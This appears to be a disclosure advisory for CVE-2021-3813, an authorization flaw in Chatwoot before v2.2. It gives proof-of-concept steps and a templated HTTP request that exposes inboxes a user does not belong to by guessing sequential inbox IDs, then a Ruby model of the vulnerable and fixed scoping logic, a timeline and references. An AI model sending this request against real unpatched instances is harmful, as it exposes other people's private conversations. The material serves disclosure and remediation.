CVE-2021-3813

Improper Privilege Management in Chatwoot prior to v2.2 - CVE-2021-3813

A user without collaborator access to an Inbox is able to reveal the messages from it, by guessing the ID of the Inbox.

Proof Of Concept

Request

  • 1; With an Administrator user, create an Inbox (email type)

  • 2; Only add the Administrator itself to the list of collaborators in the Inbox

  • 3; Create two different accounts (user A and user B; neither of them is an Administrator)

  • 4; With the Administrator, send a message to the previously created user A

  • 5; Log in with user B, and obtain the following values from the cookie and headers:

      • uid

      • access-token

      • client

      • whole cookie value

      • account_id

  • 6; With the Administrator, reveal the ID of the Inbox by reading it from the URL when the Inbox is opened. This is an incremental value, so a malicious user can easily enumerate it.

  • 7; Use the request attached below, replace the values mentioned above in the request, and also insert the inbox_id value

GET /api/v1/accounts/2/conversations?inbox_id=<INSERT_INBOX_ID_HERE>&status=open&assignee_type=all&page=1 HTTP/1.1
Host: <INSERT_HOSTNAME_HERE>:3000
Accept: application/json, text/plain, */*
expiry: 1636142330
token-type: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Referer: http://<INSERT_HOSTNAME_HERE>:3000/app/accounts/2/inbox/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: W/"8ed557c413e99925a3a4c825069d35f9"
Connection: close
Cookie: <INSERT_COOKIE_HERE>
uid: <INSERT_UID_HERE>
access-token: <INSERT_ACCESS_TOKEN_HERE>
client: <INSERT_CLIENT_HERE>
Content-Length: 2

Upon sending the crafted request, the full conversation details of the Inbox are returned to the non-collaborator user. Every Inbox in the account is exposed to any user of that account, even if they are not a collaborator of the Inbox itself.
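The flaw and its remedy, modelled in plain Ruby as an added illustration (this is not Chatwoot's code; the structures, function names and the sample inboxes and conversations are constructed assumptions): the vulnerable finder lets the client-supplied inbox_id replace the caller's membership scope, while the fixed finder intersects the two, so a non-collaborator asking for inbox 1 gets nothing back.

```ruby
# Minimal model of users, inbox membership and conversations (constructed data).
User = Struct.new(:id, :administrator)
Conversation = Struct.new(:id, :account_id, :inbox_id, :content)

# inbox_id => [member user ids]; inbox 1 has only the Administrator (user 1).
INBOX_MEMBERS = { 1 => [1], 2 => [1, 3] }.freeze
ACCOUNT_INBOX_IDS = INBOX_MEMBERS.keys.freeze
CONVERSATIONS = [
  Conversation.new(10, 2, 1, 'message sent by the Administrator in inbox 1'),
  Conversation.new(11, 2, 2, 'message in the shared inbox 2')
].freeze

ADMIN  = User.new(1, true)
USER_B = User.new(3, false)   # not a collaborator of inbox 1

# Inboxes the caller is allowed to read: all of them for an Administrator,
# otherwise only those the user is a member of.
def accessible_inbox_ids(user)
  return ACCOUNT_INBOX_IDS if user.administrator

  INBOX_MEMBERS.select { |_id, members| members.include?(user.id) }.keys
end

# Vulnerable pattern: the requested inbox_id overrides the membership scope,
# so any account user can read any inbox by guessing its (sequential) id.
def conversations_vulnerable(user, requested_inbox_id = nil)
  ids = accessible_inbox_ids(user)
  ids = [requested_inbox_id] if requested_inbox_id   # scope discarded here
  CONVERSATIONS.select { |c| ids.include?(c.inbox_id) }
end

# Hardened pattern: the requested inbox_id only narrows the membership scope.
def conversations_fixed(user, requested_inbox_id = nil)
  ids = accessible_inbox_ids(user)
  ids &= [requested_inbox_id] if requested_inbox_id  # intersect, never replace
  CONVERSATIONS.select { |c| ids.include?(c.inbox_id) }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable, user B, inbox 1: #{conversations_vulnerable(USER_B, 1).map(&:id)}"
  puts "fixed,      user B, inbox 1: #{conversations_fixed(USER_B, 1).map(&:id)}"
end
```

Running the file shows user B reading conversation 10 through the vulnerable path and receiving an empty result through the fixed one, while the Administrator still sees inbox 1 in both.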

Timeline

Reported
September 6th 2021

Validated
September 17th 2021

Fix released
February 4th 2022

References

Original report
https://huntr.dev/bounties/36f02c4f-cf1c-479e-a1ad-091a1ac7cb56/

CVE
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3813

Fix
https://github.com/chatwoot/chatwoot/commit/9454c6b14f75e778ef98cf84bdafdf0ed8ae5705